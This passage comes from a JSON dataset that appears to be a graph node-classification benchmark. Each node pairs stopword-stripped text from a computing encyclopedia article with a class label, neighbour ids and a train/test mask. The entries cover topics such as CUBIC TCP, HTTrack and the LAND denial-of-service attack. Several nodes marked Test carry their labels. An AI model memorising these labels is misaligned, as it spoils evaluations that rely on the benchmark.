      6295,
      4760,
      10392,
      1690,
      10909,
      7843,
      2213,
      7336,
      3755,
      2734,
      7855,
      1200,
      10417,
      2739,
      3262,
      3774,
      8387,
      9926,
      7368,
      10952,
      6347,
      9932,
      5325,
      11470,
      7376,
      2260,
      2262,
      6360,
      10457,
      3290,
      731,
      732,
      4314,
      5341,
      6877,
      7901,
      1761,
      9442,
      2275,
      5860,
      6373,
      742,
      8935,
      744,
      4843,
      10477,
      11502,
      2294,
      3320,
      4344,
      5880,
      9465,
      10492,
      5373,
      5886,
      1279,
      4863,
      8451,
      5893,
      6406,
      3851,
      9485,
      9488,
      7441,
      8465,
      3347,
      2324,
      2325,
      278,
      4883,
      7960,
      793,
      8978,
      3867,
      4892,
      5404,
      3872,
      1314,
      8998,
      300,
      3887,
      7983,
      5433,
      11577,
      7996,
      2878,
      2879,
      11583,
      3395,
      5446,
      10055,
      11594,
      331,
      1355,
      10574,
      6481,
      4435,
      5972,
      2901,
      8022,
      9048,
      7515,
      4956,
      5470,
      9055,
      8032,
      1890,
      3941,
      11621,
      2409,
      877,
      2926,
      4462,
      8047,
      7537,
      7031,
      9591,
      10615,
      3962,
      9594,
      6013,
      2430,
      895,
      4990,
      8574,
      9087,
      899,
      7044,
      10110,
      9607,
      10633,
      5516,
      6541,
      9102,
      4495,
      3473,
      1429,
      10141,
      9630,
      2975,
      10657,
      9640,
      1961,
      2985,
      3500,
      9646,
      1970,
      4023,
      8122,
      6588,
      11198,
      9664,
      1474,
      3523,
      9154,
      3525,
      8133,
      1480,
      3529,
      9160,
      2508,
      9676,
      7124,
      5589,
      9684,
      3032,
      9688,
      8666,
      988,
      8668,
      7135,
      9187,
      8167,
      9705,
      2539,
      11244,
      9710,
      9714,
      4085,
      2041,
      2558,
      9727
    ],
    "mask": "Test"
  },
  {
    "node_id": 940,
    "label": 7,
    "text": "Autonomic_computing:autonomic computing autonomic computing also known ac refers self-managing characteristics distributed computing resources adapting unpredictable changes hiding intrinsic complexity operators users initiated ibm 2001 initiative ultimately aimed develop computer systems capable self-management overcome rapidly growing complexity computing systems management reduce barrier complexity poses growth ac system concept designed make adaptive decisions using high-level policies constantly check optimize status automatically adapt changing conditions autonomic computing framework composed autonomic components ac interacting ac modeled terms two main control schemes local global sensors self-monitoring effectors self-adjustment knowledge planner/adapter exploiting policies based self- environment awareness architecture sometimes referred monitor-analyze-plan-execute mape driven vision variety architectural frameworks based self-regulating autonomic components recently proposed similar trend recently characterized significant research area multi-agent systems however approaches typically conceived centralized cluster-based server architectures mind mostly address need reducing management costs rather need enabling complex software systems providing innovative services autonomic systems involve mobile agents interacting via loosely coupled communication mechanisms autonomy-oriented computation paradigm proposed jiming liu 2001 uses artificial systems imitating social animals collective behaviours solve difficult computational problems example ant colony optimization could studied paradigm forecasts suggest computing devices use grow 38 per year average complexity device increasing currently volume complexity managed highly skilled humans demand skilled personnel already outstripping supply labour costs exceeding equipment costs ratio 18:1 computing systems brought great benefits speed automation overwhelming economic need automate maintenance 2003 ieee computer magazine article kephart chess warn dream interconnectivity computing systems devices could become “ nightmare pervasive computing ” architects unable anticipate design maintain complexity interactions state essence autonomic computing system self-management freeing administrators low-level task management delivering better system behavior general problem modern distributed computing systems complexity particular complexity management becoming significant limiting factor development large companies institutions employing large-scale computer networks communication computation distributed applications running computer networks diverse deal many tasks ranging internal control processes presenting web content customer support additionally mobile computing pervading networks increasing speed employees need communicate companies office using laptops personal digital assistants mobile phones diverse forms wireless technologies access companies data creates enormous complexity overall computer network hard control manually human operators manual control time-consuming expensive error-prone manual effort needed control growing networked computer-system tends increase quickly 80 problems infrastructure happen client specific application database layer 'autonomic service providers guarantee basic plumbing layer power hardware operating system network basic database parameters possible solution could enable modern networked computing systems manage without direct human intervention autonomic computing initiative aci aims providing foundation autonomic systems inspired autonomic nervous system human body nervous system controls important bodily functions e.g respiration heart rate blood pressure without conscious intervention self-managing autonomic system human operator takes new role instead controlling system directly he/she defines general policies rules guide self-management process process ibm defined following four types property referred self-star also called self-* self-x auto-* properties others poslad nami bertel expanded set self-star follows ibm set forth eight conditions define autonomic system system must even though purpose thus behaviour autonomic systems vary system system every autonomic system able exhibit minimum set properties achieve purpose ibm defined five evolutionary levels autonomic deployment model deployment autonomic systems design complexity autonomic systems simplified utilizing design patterns model-view-controller mvc pattern improve concern separation encapsulating functional concerns basic concept applied autonomic systems closed control loops well-known concept stems process control theory essentially closed control loop self-managing system monitors resource software hardware component autonomously tries keep parameters within desired range according ibm hundreds even thousands control loops expected work large-scale self-managing computer system fundamental building block autonomic system sensing capability sensors enables system observe external operational context inherent autonomic system knowledge purpose intention know-how operate e.g. bootstrapping configuration knowledge interpretation sensory data etc without external intervention actual operation autonomic system dictated logic responsible making right decisions serve purpose influence observation operational context based sensor input model highlights fact operation autonomic system purpose-driven includes mission e.g. service supposed offer policies e.g. define basic behaviour “ survival instinct ” seen control system would encoded feedback error function heuristically assisted system algorithm combined set heuristics bounding operational space",
    "neighbors": [
      4194,
      3323,
      4020
    ],
    "mask": "Test"
  },
  {
    "node_id": 941,
    "label": 5,
    "text": "CUBIC_TCP:cubic tcp cubic implementation tcp optimized congestion control algorithm high bandwidth networks high latency lfn long fat networks cubic tcp implemented used default linux kernels 2.6.19 well windows 10.1709 fall creators update windows server 2016 1709 update less aggressive systematic derivative bic tcp window size cubic function time since last congestion event inflection point set window size prior event cubic function two components window growth first concave portion window size quickly ramps size last congestion event next convex growth cubic probes bandwidth slowly first rapidly cubic spends lot time plateau concave convex growth region allows network stabilize cubic begins looking bandwidth another major difference cubic standard tcp flavors rely cadence rtts increase window size cubic window size dependent last congestion event standard tcp flows short round-trip delay times rtts receive acks faster therefore congestion windows grow faster flows longer rtts cubic allows fairness flows since window growth independent rtt cubic increases window real-time dependent rtt dependent like bic calculation cwnd congestion window simpler bic define following variables cwnd modeled formula_1",
    "neighbors": [
      7017,
      10924,
      823,
      6265,
      10653,
      3006,
      2079
    ],
    "mask": "Test"
  },
  {
    "node_id": 942,
    "label": 6,
    "text": "Data_Stream_Interface:data stream interface data stream interface dsi session layer used carry apple filing protocol traffic transmission control protocol apple introduced tcp mactcp open transport system 7 1990s needed file sharing protocol afp run tcp appletalk introduced appletalk session protocol asp dsi tcp coincidentally afp 2.x dsi implemented directly afp clients mac os afpfs-ng dsi spoken client afp server dsi communication contains following dsi header fields seven possible commands upon receiving dsi requests client server sends reply message reply contains dsitickle dsiclosesession commands trigger reply session set client sending dsiopensession include size receive buffer client packets called request quantum typically 1024 bytes server acknowledges request returns size data receive buffer typically 256k mac os x leopard session closure initiated either side sending dsiclosesession sender need wait reply immediately close session sending message maintaining connection done tickling dsi provides mechanism ensuring client server know still active every 30 seconds inactivity server sends tickle request client similarly client also sends tickle response packet either client server terminate dsi session fail hear 120 seconds client may also disconnect request flight neither response tickle received within 60 seconds mac os x v.10.2 later dsi command encapsulates fpgetsrvrinfo packet used client get information server n't logged data elements organized packet catalog indices pointing structured data request dsigetstatus request cause server respond following information dsigetstatus reply format identical afp fpgetsrvrinfo used aspgetstatus error codes returned afp result codes dsi never documented separately sufficiently simple static older references suitable modern implementations concepts dsi identical appletalk session protocol asp overview inside appletalk second edition helpful succinct guide afp tcp chapter apple filing protocol programming guide significant source information understanding dsi found analyzing communication afp clients servers using packet sniffer",
    "neighbors": [
      5864,
      6377,
      10924,
      8404,
      4345
    ],
    "mask": "None"
  },
  {
    "node_id": 943,
    "label": 4,
    "text": "Contingency_plan:contingency plan contingency plan plan devised outcome usual expected plan often used risk management exceptional risk though unlikely would catastrophic consequences contingency plans often devised governments businesses example suppose many employees company traveling together aircraft crashes killing aboard company could severely strained even ruined loss accordingly many companies procedures follow event disaster plan may also include standing policies mitigate disaster potential impact requiring employees travel separately limiting number employees one aircraft times crisis contingency plans often developed explore prepare eventuality cold war many governments made contingency plans protect citizens nuclear attack examples contingency plans designed inform citizens survive nuclear attack include booklets survival atomic attack protect survive fallout protection issued british american governments today still contingency plans place deal terrorist attacks catastrophes national institute standards technology published contingency planning guide information technology systems cantor fitzgerald financial services company prominent example successful implementation business contingency plan space two hours firm lost 658 960 new york employees september 11 attacks well much office space trading facilities despite significant losses firm able resume business within week remains successful company today united states hazmat operations require contingency plans united states environmental protection agency rcra epcra defined specific formats local emergency planning national contingency plan",
    "neighbors": [
      7337,
      7979,
      4689,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 944,
    "label": 8,
    "text": "HTTrack:httrack httrack free open-source web crawler offline browser developed xavier roche licensed gnu general public license version 3 httrack allows users download world wide web sites internet local computer default httrack arranges downloaded site original site relative link-structure downloaded mirrored website browsed opening page site browser httrack also update existing mirrored site resume interrupted downloads httrack configurable options filters include/exclude integrated help system basic command line version two gui versions winhttrack webhttrack former part scripts cron jobs httrack uses web crawler download website parts website may downloaded default due robots exclusion protocol unless disabled program httrack follow links generated basic javascript inside applets flash complex links generated using functions expressions server-side image maps",
    "neighbors": [
      1664,
      6528,
      6657,
      3971,
      2566,
      3462,
      7943,
      8584,
      6797,
      2318,
      2579,
      7572,
      11284,
      2459,
      7965,
      10910,
      8351,
      3744,
      5026,
      3875,
      1834,
      9770,
      7340,
      559,
      7983,
      9908,
      4661,
      823,
      3639,
      11449,
      4797,
      64,
      8769,
      10057,
      714,
      5707,
      7627,
      7885,
      11466,
      4048,
      10834,
      4310,
      5078,
      1240,
      6231,
      6747,
      8923,
      737,
      5605,
      4326,
      487,
      4473,
      1642,
      8169,
      9834,
      8557,
      494,
      1520,
      113,
      7152,
      115,
      9843,
      119,
      4728,
      1913,
      5114,
      8443,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 945,
    "label": 7,
    "text": "Ace_Stream:ace stream ace stream peer-to-peer multimedia streaming protocol built using bittorrent technology ace stream recognized sources potential method broadcasting viewing bootlegged live video streams protocol functions client server users stream video feed using ace stream simultaneously downloading peers uploading video peers ace stream began name torrentstream pilot project use bittorrent technology stream live video 2013 torrentstream re-released name ace stream",
    "neighbors": [
      8640,
      8833,
      3428,
      4490,
      7921
    ],
    "mask": "None"
  },
  {
    "node_id": 946,
    "label": 1,
    "text": "Transitive_dependency:transitive dependency transitive dependency functional dependency holds virtue transitivity among various software components computer program direct dependency functionality exported library api software component referenced directly program transitive dependency dependency induced components program references directly e.g call function usually induce transitive dependency library manages i/o write log message file dependencies transitive dependencies resolved different times depending computer program assembled and/or executed e.g compiler link phase dependencies resolved sometimes build system even allows management transitive dependencies similarly computer uses services computer program depend service started execute program transitive dependency case service service depend directly depends e.g web browser depends domain name resolution service convert web url ip address dns depend networking service access remote name server linux boot system based set configurations declare dependencies modules started boot time analyzes transitive dependencies decide execution order module start let b c designate three distinct necessarily disjoint sets attributes relation suppose three following conditions hold functional dependency → c follows 1 3 axiom transitivity transitive dependency database normalization one important features third normal form excludes certain types transitive dependencies e.f. codd inventor relational model introduced concepts transitive dependence third normal form 1971 transitive dependency occurs following relation functional dependency book → author nationality applies know book know author nationality furthermore therefore book → author nationality transitive dependency transitive dependency occurred non-key attribute author determining another non-key attribute author nationality",
    "neighbors": [
      1952,
      2945,
      5792,
      2024,
      6664,
      2804,
      9397,
      3004
    ],
    "mask": "Test"
  },
  {
    "node_id": 947,
    "label": 2,
    "text": "PackageForge:packageforge packageforge commercial graphical installation packaging software tool symbian os based smartphones packageforge allows developers graphically create software installation packages installed symbian os based phone installation user start using installed software application packageforge works providing graphical interface towards symbian package definition files .pkg developer provides information package like vendor package name version application files include package defined package compiled built symbian installation file .sis ready uploaded nokia ovi store direct installation phone sis installation files used installing flash lite python s60 symbian c/c++ qt symbian applications",
    "neighbors": [
      11277,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 948,
    "label": 3,
    "text": "Slamd64:slamd64 slamd64 linux distribution first unofficial port slackware x86-64 architecture port started shortly january 2005 first alpha release made publicly available january 2005 discontinued slackware official 64-bit version available support compiling 32-bit binaries removed 11.0 release reintroduced 12.0 release slamd64 created maintained fred emmott slamd64 latest stable release 12.2 also testing developmental version slamd64 called '-current used bleeding edge configuration",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      5670,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      5356,
      7020,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      10860,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 949,
    "label": 1,
    "text": "Aerospike_(company):aerospike company aerospike company behind aerospike open source nosql distributed database horizontally scalable high-speed lightweight data layer citrusleaf mountain view california based company rebranded aerospike august 2012 launched database 2011 company purpose-built database developers deploy real-time big data applications according study wikibon 2012 aerospike leading data-in-flash database transactional analytic applications answer 200,000 transactions per second per node additionally automatic fail-over replication cross data center synchronization aerospike database store terabytes data database primarily used advertising server-side cookie store read write performance paramount forms core user data storage admarketplace several advertising companies including bluekai tapad trade desk sony so-net exelate database also used gaming security e-commerce industries aerospike formerly known citrusleaf founded 2009 database networking industry veterans cto brian bulkowski vice president engineering operations srini v. srinivasan company rebranded aerospike 2012 august 2012 aerospike acquired database alchemydb alchemydb led russell sullivan hybrid rdbms/nosql-datastore optimized memory efficiency aerospike made acquisition funding new enterprise associates|nea draper associates columbus nova technology partners alsop louie partners december 2012 online ad broker tapad bought aerospike flash-based nosql database running ssds indices held ram aerospike database allowed tapad cost benefit dealing memory single level store utilizing flash memory extension june 2014 aerospike raised 20 million series c round funding company also announced open sourced technology company also partnered adform inmobi vizury 2014 new ceo john dillon announced february 2015 aerospike database fast key-value datastore distributed hash table delivers predictable sub-millisecond query response times also ability scale large sizes maintaining high speeds code engineered match characteristics flash memory opposed traditional methods aerospike database technology centered around row-based random access indexes memory data memory ssd solid-state drive storage database holds data accessible real time aerospike kvs database flash memory solution uses combination ram nand flash persistent storage operates making database updates ram duplicated copies made subsequent nodes database operates flash ssdss transparent elastic self-managing scale-out layer aerospike database combination three layers client layer distribution layer data storage layer aerospace client layer designed speed includes open source client libraries utilize aerospike apis track nodes keep track data distribution layer self-managing attribute automates fail-over replication data migration data storage layer flash-optimized stores data ram flash data stored policy containers referred namespaces ”",
    "neighbors": [
      2901,
      4781
    ],
    "mask": "None"
  },
  {
    "node_id": 950,
    "label": 6,
    "text": "File_archiver:file archiver file archiver computer program combines number files together one archive file series archive files easier transportation storage file archivers may employ lossless data compression archive formats reduce size archive basic archivers take list files concatenate contents sequentially archives archive files need store metadata least names lengths original files proper reconstruction possible advanced archivers store additional metadata original timestamps file attributes access control lists process making archive file called archiving packing reconstructing original files archive termed unarchiving unpacking extracting early archiver multics command archive descended ctss command name basic archiver performed compression multics also tape_archiver command abbreviated ta perhaps forerunner unix tar unix tools ar tar cpio act archivers compressors users unix tools use additional compression tools gzip bzip2 xz compress archive file packing remove compression unpacking archive file filename extensions successively added step process example archiving collection files tar compressing resulting archive file gzip results file codice_1 extension approach two goals approach however disadvantages built-in archiver microsoft windows well third-party archiving software winrar 7-zip often use graphical user interface also offer optional command-line interface windows windows archivers perform archiving compression solid compression may may offered depending product windows support winrar 7-zip offer option turned",
    "neighbors": [
      2432,
      5249,
      10121,
      1420,
      6797,
      9874,
      1940,
      9507,
      5158,
      3114,
      3371,
      10027,
      2095,
      8879,
      5682,
      819,
      6713,
      10169,
      5566,
      965,
      4165,
      1352,
      4296,
      3659,
      5067,
      10317,
      4174,
      10575,
      4561,
      11614,
      6367,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      237,
      4845,
      5492,
      6389,
      6772,
      4089,
      6908,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 951,
    "label": 9,
    "text": "Dominator_(graph_theory):dominator graph theory computer science control flow graphs node dominates node n every path entry node n must go d. notationally written dom n sometimes formula_1 n definition every node dominates number related concepts dominance first introduced reese t. prosser 1959 paper analysis flow diagrams prosser present algorithm computing dominance wait ten years edward s. lowry c. w. medlock ron cytron et al rekindled interest dominance 1989 applied problem efficiently computing placement φ functions used static single assignment form dominators dominance frontiers particularly applications compilers computing static single assignment form number compiler optimizations also benefit dominators flow graph case comprises basic blocks automatic parallelization benefits postdominance frontiers efficient method computing control dependence critical analysis memory usage analysis benefit dominator tree easily find leaks identify high memory usage hardware systems dominators used computing signal probabilities test generation estimating switching activities power noise analysis selecting cut points equivalence checking software systems used reducing size test set structural testing techniques statement branch coverage dominators node n given maximal solution following data-flow equations formula_4 start node dominator start node start node set dominators node n intersection set dominators predecessors p n. node n also set dominators n. algorithm direct solution direct solution quadratic number nodes n lengauer tarjan developed algorithm almost linear practice except artificial graphs algorithm simplified version fast faster known algorithm graphs sizes advantage increases graph size keith d. cooper timothy j. harvey ken kennedy rice university describe algorithm essentially solves data flow equations uses well engineered data structures improve performance analogous definition dominance node z said post-dominate node n paths exit node graph starting n must go z similarly immediate post-dominator node n postdominator n n't strictly postdominate strict postdominators n",
    "neighbors": [
      1952,
      7940,
      3854
    ],
    "mask": "Test"
  },
  {
    "node_id": 952,
    "label": 3,
    "text": "Football_Manager_(1982_series):football manager 1982 series football manager video game series published developed addictive games label set game creator kevin toms first game released 1982 ported home computers 1980s spawned several sequels football manager 2 1988 football manager world cup edition 1990 designed kevin toms finally football manager 3 1992 without toms involvement football manager 3 sold poorly result series came end series claimed sold million copies 1992 game start whole new genre computer game football management simulation toms developed first game video genie clone tandy trs-80 compatible also dragon 32 text game converted sinclair zx80 zx81 toms created software label addictive games launch game 1982 ported zx spectrum added animated graphics showing match highlights game huge success ported wide range systems 1984 1987 amiga amstrad cpc atari st bbc micro commodore 64 pc versions kept improved features match highlights graphics others including acorn electron atari 8-bit commodore plus/4 msx like original text game written entirely basic apart match highlights versions used text displays keyboard entry player chooses team must try earn promotion fourth first division although player keep playing many seasons wish player also competes fa cup team player names real accurately represented whichever team selected player always starts fourth division team randomly populated players player skill rating energy rating players must rested renew energy rating become injured players skill energy ratings also change end season team ratings defence midfield attack total skills defenders midfielders attackers selected energy average selected players morale increases team wins decreases lose player select team balance skills based opposing team ratings e.g increase defence rating opposition high attack rating match played screen updated goal scored versions animated graphics highlights attempts goal shown isometric 3d either end pitch scoreboard showing current score player affect game progress player must also balance finances weekly income expenditure calculated bank loans taken also basic player transfer system random players become available buy player bid squad reaches maximum 16 players available buy player also list players sale accept reject bids game progress saved time customiser utility included game players could rename teams players football manager commercial hit selling 500,000 copies first six years available game well received gaming press although sinclair user comment lack realism teams individual player ratings excitement watching game progress often seen highlight game electron user claimed game one best strategy games available home computers reviewer dave carlos stating doubt game ever bettered game nominated 1983 golden joystick awards best strategy game eventually coming second melbourne house adventure game hobbit 1985 tony hetherington computer gamer magazine included game spectrum collection 15 classic games spectrum owners 1991 reviewing £2.99 budget release amiga power awarded score 19 game out-featured practically every game genre still massively addictive referred classic one legends computer gaming zx spectrum version voted 26th best game time special issue sinclair magazine 2004 following sale addictive games prism leisure corporation 1987 kevin toms concentrated creating second football manager game unlike original basic game sequel required machine code meant working number developers various systems zx spectrum version bedrock software unlike first game stagger-released period 5 years football manager 2 launched formats time june 1988 although available much smaller range systems commodore 64 zx spectrum amstrad cpc amiga atari st pc unlike first game customiser utility original release 1989 football manager 2 expansion kit released stand alone release packed football manager 2 well able rename teams players offered chance start division one play leagues 'euro super league national team 'world championship gameplay similar first game mostly text based screens although colourful original usually contain least basic graphical elements input mostly moving cursor using either joystick mouse depending system rather entering numbers game starts player whichever team chosen division four random allocation players player must attempt gain promotion division one well fa cup player also compete league cup eventually attempt win treble added features include team sponsorship training screen allows choice long short passing tactics ability place players positions pitch done moving boxes representing players graphical screen comparing individual opponent players skills although like first game opposing players named means opposing strikers man marked another main difference first game graphical highlights versions feature full length pitch three screens rather goal attempts also half time substitutions formation changes made critical reception generally positive although mixed reviews highly positive review based mainly st version julian rignall c vg said game simply football fan dream come true beautifully structured presented game engrossing challenging addictive awarding score 9/10 sinclair user similarly impressed giving score 94 concluding improvement legendary game still looks tatty plays brilliantly contrast tony dillon review commodore user gave game 2/10 labelling game big letdown little improvement original additionally said mouse control amiga version apallingly bad criticism also levelled positive c vg review football manager world cup edition designed kevin toms various programmers different systems including bedrock software 8-bit versions main figure management game lost replaced deadline world cup dictating release date toms felt game rushed unfinished last involvement toms either series addictive games game released summer 1990 tie italia '90 platforms football manager 2 well msx game released 'big box world cup wallchart competitions including chance feature cover upcoming football manager 3 along kevin toms although never honoured toms involvement game gameplay radically changed previous two games player chooses national team must qualify compete world cup although choosing champions argentina hosts italy skips qualification player names entered start game ensuring correct although financial element transfers basic team management elements previous games still retained detail team set player given tactics highlights shown 3 screens although played top bottom rather left right also option watching overhead view whole pitch main addition game ability talk players dressing room press graphical screen shown player choose set list phrases answer reporters questions game motivate team dressing room half time affects team morale turn affects performance game widely reviewed sinclair gave broadly positive review particularly praising new team talk reporters questions questioning could win new fans gave score 82 concluding slick well-programmed got depth marianas trench sic n't like management games 'll probably end using pictures kevin toms throw darts spanish magazine microhobby gave game score 60 spectrum version game went number 2 uk sales charts behind italy 1990 football manager 3 already planned kevin toms still working prism leisure world cup edition created without involvement series creator toms cited 'artistic differences breakdown relationship prism game instead developed brian rogers bedrock software actually involved programming series since football manager 2 release game delayed playable demo zx spectrum version included cover tape september 1991 issue sinclair expected release date couple months later game finally released end 1992 also though versions planned advertised platforms football manager 2 released st amiga versions never released screenshots advertisements version released suggesting st amiga version developed 8-bit systems declining popularity 1992 complex competitors available pc 16-bit systems game never released championship manager premier manager game sold poorly game completely redesigned bears little resemblance previous installments game centres around graphical screen manager office different parts game accessed clicking various items e.g computer screen results fixtures picture team training etc. game features full 92 team league system including charity shield first time teams begin first season correct divisions 91/92 season versions 92/93 season including newly formed premier league c64 version player team previous games always begin bottom division players however resemble real footballers random names always shown middle initials game always begins team aging players low skill ratings much detail individual player attributes three endurance five skill values altered training player also face shown picking team player contracts negotiated contract players leave club transfer market much improved team league named players first time histories studied deciding buy new player matches shown side-on whole pitch screen also meant represent whole game rather edited highlights text commentary shown bottom screen match played unlike previous two games chance change tactics substitute half time team talk reporter elements also removed version game well received previous versions philip lindey sinclair user suggested difficult get excited football manager 3 overpriced giving overall score 73 stuart campbell sinclair thought game quite standard football manager 2 honest vastly inferior presentation graphics lots hanging around computer thinks n't seem working properly giving score 70 amstrad action awarded game 38 claiming live football manager 2 2001 paul robson developed accurate remake original game reverse engineering c. remake since ported gp2x google android jonn blanchard football manager name revived 2005 sports interactive continuation championship manager series lost naming rights following split publishers eidos interactive",
    "neighbors": [
      6976,
      9006,
      10173,
      6129,
      2045,
      10931,
      7421
    ],
    "mask": "None"
  },
  {
    "node_id": 953,
    "label": 4,
    "text": "LAND:land land local area network denial attack dos denial service attack consists sending special poison spoofed packet computer causing lock security flaw first discovered 1997 someone using alias m3lt resurfaced many years later operating systems windows server 2003 windows xp sp2 attack involves sending spoofed tcp syn packet connection initiation target host ip address open port source destination causes machine reply continuously however distinct tcp syn flood vulnerability land attacks since found services like snmp windows 88/tcp kerberos/global services systems design flaws would allow device accept request wire appearing causing repeated replies list vulnerable operating systems firewalls intercept discard poison packet thus protecting host attack operating systems released updates fixing security hole addition routers configured ingress egress filters block traffic destined destination source address space would include packets source destination ip addresses",
    "neighbors": [
      5506,
      4488,
      5384,
      2060,
      6797,
      10924,
      7983,
      2299,
      7091,
      4414,
      2240,
      2754,
      4163,
      10436,
      6347,
      4558,
      6735,
      2409,
      4074,
      3323,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 954,
    "label": 2,
    "text": "MSDOS.SYS:msdos.sys msdos.sys vital system file ms-dos windows 9x operating systems versions ms-dos 1.1x 6.22 file comprised ms-dos kernel responsible file access program management codice_1 loaded dos bios codice_2 part boot procedure oem versions ms-dos file named codice_3 windows 95 ms-dos 7.0 windows ms-dos 8.0 dos kernel combined dos bios single file codice_2 aka codice_5 codice_1 became plain text file containing boot configuration directives instead codice_7 file exists system retrieve configuration directives codice_7 rather codice_1 windows 9x installed preexisting dos install windows file may temporarily named codice_10 long windows dual-boot feature booted previous os likewise codice_1 older system named codice_12 long windows 9x active dos utilities expect codice_1 file minimal file size least 1 kb reason large dummy comment typically found codice_1 configuration file since windows 95 default file located root directory bootable drive/partition normally codice_15 hard disks hidden read-only system file attributes set ms-dos derivative dcp former east-german veb robotron used instead ibm pc dos well dr dos since 5.0 exception dr-dos 7.06 used file codice_16 purpose whereas dr dos 3.31 3.41 used codice_17 instead freedos uses file codice_18 purpose windows nt-based operating systems nt 3.1-4 2000 xp 2003 use ntldr file nt 6+ operating systems vista 2008 7 8 8.1 10 use bootmgr instead different boot sequence msdos.sys windows 9x 95/98/me",
    "neighbors": [
      292,
      6148,
      5158,
      9066,
      8301,
      9166,
      8976,
      5425,
      3314,
      5363,
      9972,
      9525,
      4727,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 955,
    "label": 9,
    "text": "Heinz_Zemanek:heinz zemanek heinz zemanek 1 january 1920 – 16 july 2014 austrian computer pioneer led development 1954 1958 one first complete transistorised computers european continent computer nicknamed mailüfterl — german may breeze — reference whirlwind computer developed mit 1945 1951 heinz zemanek went secondary school vienna earned matura 1937 started study university vienna 1940 zemanek drafted wehrmacht served communication unit also teacher intelligence service school returning studying radar technology earned diplom 1944 help university stuttgart professor richard feldtkeller 1901–1981 war zemanek worked assistant university earned phd 1951 timesharing methods multiplex telegraphy 1952 completed urr1 universal relais rechner 1 i.e. universal relay computer 1 died age 94 16 july 2014 ibm laboratory vienna also known vienna lab founded 1961 department ibm laboratory böblingen germany professor zemanek first manager zemanek remained vienna lab 1976 appointed ibm fellow crucial creation formal definition programming language pl/i several years zemanek lecturer vienna university technology features lecture hall named honor also long-time member international federation information processing president 1971 1974 professor zemanek joined boy scouts 1932 served scout leader international secretary austria 1946–1949 international commissioner pfadfinder österreichs 1949–1954",
    "neighbors": [
      512,
      8262,
      7055,
      8502,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 956,
    "label": 4,
    "text": "@MAX_SyncUp:max syncup max syncup free proprietary backup file synchronization program developed max software windows targeted individuals small businesses software supports backup locally writable folders including attached usb devices network drives local directories also supports backup synchronization webdav servers ftp servers cloud storages google drive dropbox users allowed use free edition program personal non-commercial purposes free edition allows using 1 fully functional backup synchronization profile unlimited time pro-version max syncup restrictions use provides fully functional 30-day trial period users may use max syncup free evaluation purposes max syncup allows users create backup copies files recover data backup copies including recovering old versions files changed files destroyed also allows users synchronize files two separate locations directions schedule backups synchronizations starting version 4.0 max syncup executes synchronization using rsync-like synchronization method due method users set direct synchronization two computers internet without cloud storage rsync-like algorithm detects changes synchronized files transfers parts files changed since previous synchronization minimizes network traffic reduces time required synchronize files especially synchronize large files small changes also max syncup provides backup strategy apple time machine style hard links created unchanged files uncompressed backups files created file structure retained hard links allow saving disk space placing file several folders users manage backups thinning old backups keep recent copies rather older ones version 4.2 measured “ really full featured software backup ” software comes even close max syncup crashplan reviewers complimented max syncup ease use customizability pc advisor expert review stating walks fine line power ease use well however reviewers criticised program lack cloud backup options limited google drive free storage pc advisor gave program 3.5 stars 5 max syncup 3.0",
    "neighbors": [
      9025,
      4194,
      7364,
      3366,
      5482,
      6797,
      1358,
      4623,
      7983,
      1844
    ],
    "mask": "Validation"
  },
  {
    "node_id": 957,
    "label": 4,
    "text": "Service_authentication:service authentication service authentication refers identity verification process service provider user far virtually types authentication user authentication user provides credentials service lieu service providing identity credentials user steady rise needs service authentication protect users malicious hacking attack commonly known ‘ pharming ’ lures users fake sites since pharming effectively entices user believe site genuine obviously vital users find way carefully verify authenticity site service authentication type mutual authentication technology combined international standard security protocol would prevent pharming attacks properly administered providing identity credentials server client securely encrypted communication several attempts within community security vendors iam providers successfully incorporate service authentication robust protection client-server communication secure sockets layer certificate refers set data files bind encrypted public key organization critical information certificate must installed first web server ensure secure communication secure connection established installing ssl certificate users safely conduct transactions web service data transfer web server web browser safely encrypted process user able verify whether site connection secure authentic since service provider authenticates authenticity first web server authentication web browser protect pharming since guarantees users 're fake site another standard service authentication technology uses personalized images known user authenticate identity service server technology used authenticating whether user person computer e.g image-based captcha user first registers personalized multiple images server user authentication process server pulls images storage user identify service process repeats times increase accuracy correct identification user must statistically close enough convinced validity server resembles knowledge-based authentication kba knowledge user determining factor service authentication human interaction plays key role entire user authentication process qr codes two-dimensional bar codes store encrypted array sensitive data used users instantly identify server using smartphones user log web site without needing type user id password user scans qr code generated pc verify server secure able effectively protect hacking threats uses specific time session cookie shared secret server user pc device-dependent technology service authentication methods needs set pc smartphone work properly new service authentication technology eliminated need type user password replaced conventional machine-to-machine service authentication human interaction trust human interaction plays major role users visually verify authenticity service identifying code generated server smartphones code generated service server challenge response-based one time password specific seed value binding complex session values user credentials users expect engage secure communication service server since service generates provides credentials user first especially effective protecting users pharming attacks",
    "neighbors": [
      3521,
      6562,
      10915,
      519,
      6064,
      5433,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 958,
    "label": 3,
